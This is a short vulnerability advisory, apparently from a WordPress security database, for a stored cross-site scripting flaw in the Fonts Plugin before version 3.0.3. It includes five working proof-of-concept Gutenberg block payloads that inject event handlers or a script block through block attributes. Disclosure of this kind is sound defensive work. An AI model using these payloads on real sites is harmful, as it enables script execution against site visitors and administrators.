Fonts Plugin < 3.0.3 - Contributor+ Stored Cross-Site Scripting

2021-08-2300:00:00

apple502j

313

cross-site scripting

contributor

stored data

security vulnerability

exploit

EPSS

0.001

Percentile

24.8%

JSON

The plugin does not escape and sanitise some of its block settings, allowing users with as role as low as Contributor to perform Stored Cross-Site Scripting attacks via blockType (combined with content), align, color, variant and fontID argument of a Gutenberg block.

As a contributor, put the following code in a post/page while in Code Editor mode

< 3.0.2
<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"0","variant":"400","content":"Hello, World!","color":"red;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(1+origin)//"} /-->

<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"0","variant":"400","align":"center;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(2+origin)//","content":"Hello, World!"} /-->

<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"Arial;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(origin)//","variant":"400","content":"Hello, World!"} /-->

<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"Arial","variant":"400;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(/Variant/)//","content":"Hello, World!"} /-->

< 3.0.3
<!-- wp:olympus-google-fonts/google-fonts {"blockType":"script","fontID":"0","variant":"400","content":"alert(\u0022xss\u0022)"} /-->

EPSS

0.001

Percentile

24.8%

JSON

Related for WPEX-ID:DD2B3F22-5E8B-41CF-BCB8-D2E673E1D21E